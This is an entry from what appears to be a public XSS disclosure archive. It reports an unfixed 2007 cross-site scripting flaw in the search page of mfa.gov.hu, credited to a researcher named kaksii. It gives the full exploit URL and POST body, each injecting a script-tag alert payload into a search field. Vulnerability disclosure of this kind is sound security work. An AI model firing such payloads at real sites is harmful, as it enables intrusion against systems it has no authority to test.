Security researcher kaksii submitted a cross-site scripting (XSS) vulnerability affecting mfa.gov.hu on 05/11/2007; at the time of submission the site ranked 15316 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/11/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 05/11/2007
Date published: 05/11/2007
Status: UNFIXED
Author: kaksii
Domain: mfa.gov.hu
Category: XSS
Pagerank: 15316
URL: http://mfa.gov.hu/kum2005/Templates/Search.aspx?NRMODE=Published&NRORIGINALURL=%2Fkum%2Fhu%2Fbal%2Fsearch%3Fb%3D1&NRNODEGUID=%7B6A7B8B97-9E10-42DB-A303-1A87DD500507%7D&NRCACHEHINT=NoModifyGuest&kereso='%22%3E%3Cscript%3Ealert(1)%3C&b=1
POST: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=[...]&kereso=&SearchControl1%3AtxtSearchTerm=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&SearchControl1%3AbtnSearch=Keres%C3%A9s